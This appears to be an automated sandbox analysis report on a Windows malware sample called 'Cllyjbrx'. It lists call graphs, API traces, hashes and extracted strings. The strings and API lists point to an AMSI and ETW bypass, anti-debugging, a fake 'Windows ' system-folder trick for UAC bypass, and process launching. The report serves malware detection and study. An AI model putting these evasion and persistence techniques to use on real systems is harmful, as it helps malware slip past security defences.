31b89d0 call 31a46d4 * 2 call 31b89d0 call 31a46d4 * 2 call 31b89d0 call 31a46d4 * 2 call 31b89d0 call 31b7c10 call 31b8338 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 ExitProcess 4689->4780 4779->4780 4789 31c953f-31c9812 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31bf094 call 31a4860 call 31a49a0 
call 31a46d4 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a7e5c 4779->4789 5045 31c9aef-31c9cf0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a49f8 call 31b8d70 4789->5045 5046 31c9818-31c9aea call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31be358 call 31a4530 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4de0 * 2 call 31a4764 call 31bdc8c 4789->5046 4898 31c887b-31c887e 4798->4898 4899 31c8880-31c8ba0 call 31a49f8 call 31bde50 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31bd164 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 4798->4899 4799->4798 4898->4899 5216 31c8bb9-31c939c call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 
31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 ResumeThread call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 CloseHandle call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31b8080 call 31b894c * 6 CloseHandle call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 4899->5216 5217 31c8ba2-31c8bb4 call 31b8730 4899->5217 5045->4780 5046->5045 5216->4689 5217->5216
APIs
  • Part of subcall function 031B89D0: FreeLibrary.KERNEL32(03227388,00000000,00000000,00000000,00000000,0322738C,Function_0000562C,00000004,0322739C,0322738C,05F5E103,00000040,032273A0,03227388,00000000,00000000), ref: 031B8AAA
• CreateProcessAsUserW.ADVAPI32(0331B7DC,00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,0331B7E0,0331B824,OpenSession,03223160,031CB7B8,UacScan,03223160), ref: 031C86E9
• ResumeThread.KERNEL32(0331B828,ScanBuffer,03223160,031CB7B8,OpenSession,03223160,031CB7B8,UacScan,03223160,031CB7B8,ScanBuffer,03223160,031CB7B8,OpenSession,03223160,031CB7B8), ref: 031C8D33
• CloseHandle.KERNEL32(0331B824,ScanBuffer,03223160,031CB7B8,OpenSession,03223160,031CB7B8,UacScan,03223160,031CB7B8,0331B828,ScanBuffer,03223160,031CB7B8,OpenSession,03223160), ref: 031C8EB2
  • Part of subcall function 031B894C: LoadLibraryW.KERNEL32(?,?), ref: 031B8960
  • Part of subcall function 031B894C: GetProcAddress.KERNEL32(03227394,BCryptVerifySignature), ref: 031B897A
  • Part of subcall function 031B894C: FreeLibrary.KERNEL32(03227394,03227394,BCryptVerifySignature,bcrypt,?,032273D4,00000000,032273A8,031BA587,ScanString,032273A8,031BA93C,ScanBuffer,032273A8,031BA93C,Initialize), ref: 031B89B6
• CloseHandle.KERNEL32(0331B824,0331B824,ScanBuffer,03223160,031CB7B8,UacInitialize,03223160,031CB7B8,ScanBuffer,03223160,031CB7B8,OpenSession,03223160,031CB7B8,UacScan,03223160), ref: 031C92A4
  • Part of subcall function 031BDC8C: RtlDosPathNameToNtPathName_U.NTDLL(00000000,?,00000000,00000000), ref: 031BDCCB
  • Part of subcall function 031BDC8C: NtWriteFile.NTDLL(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000), ref: 031BDD32
  • Part of subcall function 031BDC8C: NtClose.NTDLL(?), ref: 031BDD3B
  • Part of subcall function 031B8338: FlushInstructionCache.KERNEL32(?,?,?,00000000,Kernel32,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,031B83C2), ref: 031B83A4
• ExitProcess.KERNEL32(00000000,OpenSession,03223160,031CB7B8,ScanBuffer,03223160,031CB7B8,Initialize,03223160,031CB7B8,00000000,00000000,00000000,ScanString,03223160,031CB7B8), ref: 031CB2FA
Strings
Memory Dump Source
• Source File: 0000000A.00000002.1831975910.00000000031A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031A1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_31a1000_Cllyjbrx.jbxd
Similarity
• API ID: CloseLibrary$FreeHandlePathProcess$AddressCacheCreateExitFileFlushInstructionLoadNameName_ProcResumeThreadUserWrite
                                                                                              • String ID: Advapi$BCryptVerifySignature$C:\Windows\System32\$CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPVerifyIndirectData$DllGetClassObject$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FlushInstructionCache$GetProcessMemoryInfo$I_QueryTagInformation$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MiniDumpReadDumpStream$MiniDumpWriteDump$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenObjectAuditAlarm$NtOpenProcess$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtSetSecurityObject$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RetailTracerEnable$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$SLGetGenuineInformation$SLGetSLIDList$SLIsGenuineLocalEx$SLLoadApplicationPolicies$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$UacInitialize$UacScan$VirtualAlloc$VirtualAllocEx$VirtualProtect$WriteVirtualMemory$advapi32$bcrypt$dbgcore$endpointdlp$kernel32$mssip32$ntdll$psapi$psapi$spp$sppc$sppwmi$tquery
                                                                                              • API String ID: 376050052-1225450241

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                                • Part of subcall function 031B89D0: FreeLibrary.KERNEL32(03227388,00000000,00000000,00000000,00000000,0322738C,Function_0000562C,00000004,0322739C,0322738C,05F5E103,00000040,032273A0,03227388,00000000,00000000), ref: 031B8AAA
                                                                                                • Part of subcall function 031BDC8C: RtlDosPathNameToNtPathName_U.NTDLL(00000000,?,00000000,00000000), ref: 031BDCCB
                                                                                                • Part of subcall function 031BDC8C: NtWriteFile.NTDLL(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000), ref: 031BDD32
                                                                                                • Part of subcall function 031BDC8C: NtClose.NTDLL(?), ref: 031BDD3B
                                                                                              • Sleep.KERNEL32(000003E8,ScanBuffer,03223160,031CB7B8,UacScan,03223160,031CB7B8,ScanString,03223160,031CB7B8,031CBB30,00000000,00000000,031CBB24,00000000,00000000), ref: 031C40CB
                                                                                                • Part of subcall function 031B88B8: LoadLibraryW.KERNEL32(amsi), ref: 031B88C1
                                                                                                • Part of subcall function 031B88B8: FreeLibrary.KERNEL32(00000000,00000000,?,?,00000006,?,?,000003E7,00000040,?,00000000,DllGetClassObject), ref: 031B8920
                                                                                              • Sleep.KERNEL32(000003E8,ScanBuffer,03223160,031CB7B8,OpenSession,03223160,031CB7B8,UacScan,03223160,031CB7B8,000003E8,ScanBuffer,03223160,031CB7B8,UacScan,03223160), ref: 031C4277
                                                                                                • Part of subcall function 031B894C: LoadLibraryW.KERNEL32(?,?), ref: 031B8960
                                                                                                • Part of subcall function 031B894C: GetProcAddress.KERNEL32(03227394,BCryptVerifySignature), ref: 031B897A
                                                                                                • Part of subcall function 031B894C: FreeLibrary.KERNEL32(03227394,03227394,BCryptVerifySignature,bcrypt,?,032273D4,00000000,032273A8,031BA587,ScanString,032273A8,031BA93C,ScanBuffer,032273A8,031BA93C,Initialize), ref: 031B89B6
                                                                                              • Sleep.KERNEL32(00004E20,UacScan,03223160,031CB7B8,ScanString,03223160,031CB7B8,ScanBuffer,03223160,031CB7B8,OpenSession,03223160,031CB7B8,UacInitialize,03223160,031CB7B8), ref: 031C50EE
                                                                                                • Part of subcall function 031BDC04: RtlInitUnicodeString.NTDLL ref: 031BDC2C
                                                                                                • Part of subcall function 031BDC04: RtlDosPathNameToNtPathName_U.NTDLL(00000000,00000000,00000000,00000000), ref: 031BDC42
                                                                                                • Part of subcall function 031BDC04: NtDeleteFile.NTDLL(?), ref: 031BDC61
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.1831975910.00000000031A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031A1000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_31a1000_Cllyjbrx.jbxd
                                                                                              Similarity
                                                                                              • API ID: Library$Path$FreeSleep$FileLoadNameName_$AddressCloseDeleteInitProcStringUnicodeWrite
                                                                                              • String ID: /d $ /o$.url$C:\Users\Public\$C:\Users\Public\CApha.exe$C:\Users\Public\alpha.exe$C:\Users\Public\pha.exe$C:\\Users\\Public\\Libraries\\$C:\\Windows \\SysWOW64\\$C:\\Windows \\SysWOW64\\per.exe$C:\\Windows\\System32\\esentutl.exe /y $HotKey=$IconIndex=$Initialize$OpenSession$ScanBuffer$ScanString$URL=file:"$UacInitialize$UacScan$UacUninitialize$[InternetShortcut]$lld.SLITUTEN
                                                                                              • API String ID: 3582580975-3926298568

                                                                                              APIs
                                                                                              • Sleep.KERNEL32(00000000), ref: 031A17D0
                                                                                              • Sleep.KERNEL32(0000000A,00000000), ref: 031A17E6
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.1831975910.00000000031A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031A1000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_31a1000_Cllyjbrx.jbxd
                                                                                              Similarity
                                                                                              • API ID: Sleep
                                                                                              • String ID:
                                                                                              • API String ID: 3472027048-0
                                                                                              • Opcode ID: 0b653f732f2a7654bbad9c16bb3a5da014e32f49afd5debfd5ad4bec20c14e13
                                                                                              • Instruction ID: a900727662a8f8fdddd1e80277177d63714fef98cdad5af3c002e48c306762cb
                                                                                              • Opcode Fuzzy Hash: 0b653f732f2a7654bbad9c16bb3a5da014e32f49afd5debfd5ad4bec20c14e13
                                                                                              • Instruction Fuzzy Hash: 2DB1457A600B50AFC725EF6DE884365FBE0EB8A352F19C2BED4198B389C7709441C790

                                                                                              APIs
                                                                                              • LoadLibraryW.KERNEL32(?,?), ref: 031B8960
                                                                                              • GetProcAddress.KERNEL32(03227394,BCryptVerifySignature), ref: 031B897A
                                                                                              • FreeLibrary.KERNEL32(03227394,03227394,BCryptVerifySignature,bcrypt,?,032273D4,00000000,032273A8,031BA587,ScanString,032273A8,031BA93C,ScanBuffer,032273A8,031BA93C,Initialize), ref: 031B89B6
                                                                                                • Part of subcall function 031B7D78: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 031B7DEC
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.1831975910.00000000031A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031A1000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_31a1000_Cllyjbrx.jbxd
                                                                                              Similarity
                                                                                              • API ID: Library$AddressFreeLoadMemoryProcVirtualWrite
                                                                                              • String ID: BCryptVerifySignature$bcrypt
                                                                                              • API String ID: 1002360270-4067648912
                                                                                              • Opcode ID: 97c5b1513f4323c685f0dd5dbb158ec89855aed9199f460e5edcb2e4945c1015
                                                                                              • Instruction ID: 88cdc3519d029fa3ec24f9d8d61988db2c7fa09c6f1be368fdd340c0252a3137
                                                                                              • Opcode Fuzzy Hash: 97c5b1513f4323c685f0dd5dbb158ec89855aed9199f460e5edcb2e4945c1015
                                                                                              • Instruction Fuzzy Hash: 28F08C71609354FFE730FA6CBC8DF9677AC97A8A21F085129AD088A186C77018808750

                                                                                              APIs
                                                                                              • LoadLibraryW.KERNEL32(amsi), ref: 031B88C1
                                                                                                • Part of subcall function 031B8274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 031B82C7
                                                                                                • Part of subcall function 031B8274: GetProcAddress.KERNEL32(?,?), ref: 031B82D9
                                                                                                • Part of subcall function 031B7D78: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 031B7DEC
                                                                                              • FreeLibrary.KERNEL32(00000000,00000000,?,?,00000006,?,?,000003E7,00000040,?,00000000,DllGetClassObject), ref: 031B8920
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.1831975910.00000000031A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031A1000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_31a1000_Cllyjbrx.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressLibraryProc$FreeLoadMemoryVirtualWrite
                                                                                              • String ID: DllGetClassObject$W$amsi
                                                                                              • API String ID: 2980007069-2671292670
                                                                                              • Opcode ID: fbbb97e11304113df3e7035999d04f9dcbe778440396e5bef9254dc137eb37cb
                                                                                              • Instruction ID: f04a340fb6a461c047079bb7019bad0cccf6b7640e725ba41c93666e874dde4a
                                                                                              • Opcode Fuzzy Hash: fbbb97e11304113df3e7035999d04f9dcbe778440396e5bef9254dc137eb37cb
                                                                                              • Instruction Fuzzy Hash: 44F0879454C781BBC601E678CC45F8FBADC4BAA564F048A58F1E8AE2D2D77AD10483A7

                                                                                              APIs
                                                                                              • GetModuleHandleW.KERNEL32(KernelBase), ref: 031BF754
                                                                                              • GetProcAddress.KERNEL32(00000000,CheckRemoteDebuggerPresent), ref: 031BF766
                                                                                              • CheckRemoteDebuggerPresent.KERNEL32(FFFFFFFF,?,00000000,CheckRemoteDebuggerPresent,KernelBase), ref: 031BF77D
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.1831975910.00000000031A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031A1000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_31a1000_Cllyjbrx.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressCheckDebuggerHandleModulePresentProcRemote
                                                                                              • String ID: CheckRemoteDebuggerPresent$KernelBase
                                                                                              • API String ID: 35162468-539270669
                                                                                              • Opcode ID: 8cff3ba7880fa5bf20dc5e3b6f071af4b7409acb740b2325bc2ca1f3e5e30db4
                                                                                              • Instruction ID: 6afbb7447d63ac36538746888fdf2a179c44baa55de7c84b28b55d261f7f7c72
                                                                                              • Opcode Fuzzy Hash: 8cff3ba7880fa5bf20dc5e3b6f071af4b7409acb740b2325bc2ca1f3e5e30db4
                                                                                              • Instruction Fuzzy Hash: 10F0A075904248BFDB10EAF98C887DCFBB89B0D226F2843D0E434A21D2E7710685C691

                                                                                              APIs
                                                                                              • Sleep.KERNEL32(00000000), ref: 031A1B17
                                                                                              • Sleep.KERNEL32(0000000A,00000000), ref: 031A1B31
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.1831975910.00000000031A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031A1000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_31a1000_Cllyjbrx.jbxd
                                                                                              Similarity
                                                                                              • API ID: Sleep
                                                                                              • String ID:
                                                                                              • API String ID: 3472027048-0
                                                                                              • Opcode ID: 3c3027a1fe770c552e5e042d572b46038b4a786e6f4d6aa34d99576ef22bf97a
                                                                                              • Instruction ID: e8758a365e7218650fbb20e89ca4aa5185d2713ce8dcd1e6300cf26db6d5652e
                                                                                              • Opcode Fuzzy Hash: 3c3027a1fe770c552e5e042d572b46038b4a786e6f4d6aa34d99576ef22bf97a
                                                                                              • Instruction Fuzzy Hash: CE51F379600B40AFD725DF6CD984766BBE4AF4E312F1881BED848CB296E7B0C445C791

                                                                                              APIs
                                                                                              • InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 031BE5F6
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.1831975910.00000000031A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031A1000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_31a1000_Cllyjbrx.jbxd
                                                                                              Similarity
                                                                                              • API ID: CheckConnectionInternet
                                                                                              • String ID: Initialize$OpenSession$ScanBuffer
                                                                                              • API String ID: 3847983778-3852638603
                                                                                              • Opcode ID: 86f4675884911a6df7512431eec5d7227268b15a94e32a2aa81812ddd9439287
                                                                                              • Instruction ID: 51ebb6483d23eb9fbb482b36b0ddbdb1479209c7167c296e3905acf7328bed42
                                                                                              • Opcode Fuzzy Hash: 86f4675884911a6df7512431eec5d7227268b15a94e32a2aa81812ddd9439287
                                                                                              • Instruction Fuzzy Hash: 0941EE3DB1464C9FDB10EBA9E881ADEB3B9EF8C601F604425E050AB350DFB4AD158B65

                                                                                              APIs
                                                                                              • InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 031BE5F6
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.1831975910.00000000031A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031A1000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_31a1000_Cllyjbrx.jbxd
                                                                                              Similarity
                                                                                              • API ID: CheckConnectionInternet
                                                                                              • String ID: Initialize$OpenSession$ScanBuffer
                                                                                              • API String ID: 3847983778-3852638603
                                                                                              • Opcode ID: 52cd248eaa31f3eea405475792f22924ec6c71a4bce8fe76a0611a8cc1b638df
                                                                                              • Instruction ID: 0fc9591a10497e8df536f2588aaccb07e97c882509b0d9404bfd8e87706e932e
                                                                                              • Opcode Fuzzy Hash: 52cd248eaa31f3eea405475792f22924ec6c71a4bce8fe76a0611a8cc1b638df
                                                                                              • Instruction Fuzzy Hash: 8241FF3DA1464C9FDB10EBA9E881ADEB3B9EF8C601F604425E050AB350DFB4AD158B65

                                                                                              APIs
                                                                                                • Part of subcall function 031B81CC: GetModuleHandleA.KERNELBASE(?), ref: 031B821E
                                                                                                • Part of subcall function 031B8274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 031B82C7
                                                                                                • Part of subcall function 031B8274: GetProcAddress.KERNEL32(?,?), ref: 031B82D9
                                                                                              • CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 031B8814
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.1831975910.00000000031A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031A1000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_31a1000_Cllyjbrx.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressProc$CreateHandleModuleProcessUser
                                                                                              • String ID: CreateProcessAsUserW$Kernel32
                                                                                              • API String ID: 952078031-2353454454
                                                                                              • Opcode ID: b1978c2b0be9e1aeee43ebd8d4df1038a2ab4303ac0ace2e04214b946da5e108
                                                                                              • Instruction ID: 48b3503bd3a17c879d479350e6e01312f1a2da7293e541ea07486ed520caca87
                                                                                              • Opcode Fuzzy Hash: b1978c2b0be9e1aeee43ebd8d4df1038a2ab4303ac0ace2e04214b946da5e108
                                                                                              • Instruction Fuzzy Hash: 481192BA604648BFDB50EEADEC91FDA77ECEB4CA00F514060FA08D7641C774E9108B65
                                                                                              APIs
                                                                                              • SysFreeString.OLEAUT32(?), ref: 031B73DA
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.1831975910.00000000031A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031A1000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_31a1000_Cllyjbrx.jbxd
                                                                                              Similarity
                                                                                              • API ID: FreeString
                                                                                              • String ID: H
                                                                                              • API String ID: 3341692771-2852464175
                                                                                              • Opcode ID: 8cdcbd462c58b22f2933a1327d5e38640eb1394ddcdc02f6fed5893d88f8cdcf
                                                                                              • Instruction ID: b2cfaa4b15615b3e55dc60239fb5940140ae47acb7d84d484b3eb9077d75bc69
                                                                                              • Opcode Fuzzy Hash: 8cdcbd462c58b22f2933a1327d5e38640eb1394ddcdc02f6fed5893d88f8cdcf
                                                                                              • Instruction Fuzzy Hash: 24B1C278A016089FDB15CF99D880ADDBBF6FF8D310F2585A9E845AB360D730A845CF60
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.1831975910.00000000031A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031A1000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_31a1000_Cllyjbrx.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 6a24f48e88f2bf155e618fd0f2a2f6023c8b0533f914f5c7d5c7c8f150af463b
                                                                                              • Instruction ID: 26b6a6584141fde19948508bf3385951f464bba92ace0af2002434d415bd4c1b
                                                                                              • Opcode Fuzzy Hash: 6a24f48e88f2bf155e618fd0f2a2f6023c8b0533f914f5c7d5c7c8f150af463b
                                                                                              • Instruction Fuzzy Hash: 51419E7D900A14EFDB28EF6EF8483557BE4EB1D312F599469D8048B348CBB09885CB55
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.1831975910.00000000031A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031A1000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_31a1000_Cllyjbrx.jbxd
                                                                                              Similarity
                                                                                              • API ID: ClearVariant
                                                                                              • String ID:
                                                                                              • API String ID: 1473721057-0
                                                                                              • Opcode ID: 7dbf56415bc9d362e0aec6b856fd48822fd7d52ad02a0fbcb92b377d478bdc96
                                                                                              • Instruction ID: c6a368786ad219546db0107cbae7fc879da54c7573622a2fa515620ee8258a4f
                                                                                              • Opcode Fuzzy Hash: 7dbf56415bc9d362e0aec6b856fd48822fd7d52ad02a0fbcb92b377d478bdc96
                                                                                              • Instruction Fuzzy Hash: ACF0AF6C708A10C7EB24FB3E8DC456D27989F4C343B143876E4069F205CB658C8983B2
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.1831975910.00000000031A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031A1000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_31a1000_Cllyjbrx.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitVariant
                                                                                              • String ID:
                                                                                              • API String ID: 1927566239-0
                                                                                              • Opcode ID: 093da035ec35ebbb9968446ed9ae6352b0e4155b1a36b680de0b061d7f3e69b5
                                                                                              • Instruction ID: 144b62c9e11a3e91850bd6a75139fdd424a3bb49ed5d9cb80653204b0298bf8c
                                                                                              • Opcode Fuzzy Hash: 093da035ec35ebbb9968446ed9ae6352b0e4155b1a36b680de0b061d7f3e69b5
                                                                                              • Instruction Fuzzy Hash: 49317179604A08AFDB14DFACD8889AEBBFCEB0C212F584565F904D7240D334DA90CBB1
                                                                                              APIs
                                                                                                • Part of subcall function 031B81CC: GetModuleHandleA.KERNELBASE(?), ref: 031B821E
                                                                                                • Part of subcall function 031B8274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 031B82C7
                                                                                                • Part of subcall function 031B8274: GetProcAddress.KERNEL32(?,?), ref: 031B82D9
                                                                                                • Part of subcall function 031B7D78: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 031B7DEC
                                                                                                • Part of subcall function 031B8338: FlushInstructionCache.KERNEL32(?,?,?,00000000,Kernel32,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,031B83C2), ref: 031B83A4
                                                                                              • FreeLibrary.KERNEL32(03227388,00000000,00000000,00000000,00000000,0322738C,Function_0000562C,00000004,0322739C,0322738C,05F5E103,00000040,032273A0,03227388,00000000,00000000), ref: 031B8AAA
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.1831975910.00000000031A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031A1000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_31a1000_Cllyjbrx.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressProc$CacheFlushFreeHandleInstructionLibraryMemoryModuleVirtualWrite
                                                                                              • String ID:
                                                                                              • API String ID: 1648090374-0
                                                                                              • Opcode ID: 3992cf2d292fdd343620fa7ef38b878a326c8f0f1e85e4b117bc2c8adeaf14c5
                                                                                              • Instruction ID: 413ee0fb2e372b3de6c06d345822de7c3fc9411e3285857fc337108e84f356d9
                                                                                              • Opcode Fuzzy Hash: 3992cf2d292fdd343620fa7ef38b878a326c8f0f1e85e4b117bc2c8adeaf14c5
                                                                                              • Instruction Fuzzy Hash: F121817C758744BFDB50FBBDDC02F9D7AA89B4CA01F501460F514EF682CBB4A9408618
                                                                                              APIs
                                                                                              • VariantCopy.OLEAUT32(00000000,00000000), ref: 031AE781
                                                                                                • Part of subcall function 031AE364: VariantClear.OLEAUT32(?), ref: 031AE373
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.1831975910.00000000031A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031A1000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_31a1000_Cllyjbrx.jbxd
                                                                                              Similarity
                                                                                              • API ID: Variant$ClearCopy
                                                                                              • String ID:
                                                                                              • API String ID: 274517740-0
                                                                                              • Opcode ID: 2f7bc6703029b537cc3c0958fa9f72b3d5fce08f432651dac9d9f0416ab38ddb
                                                                                              • Instruction ID: ed7bd3f16088e58454184136246fbd8b4bb2ad7ee0582e47df3682fd21eaf1ca
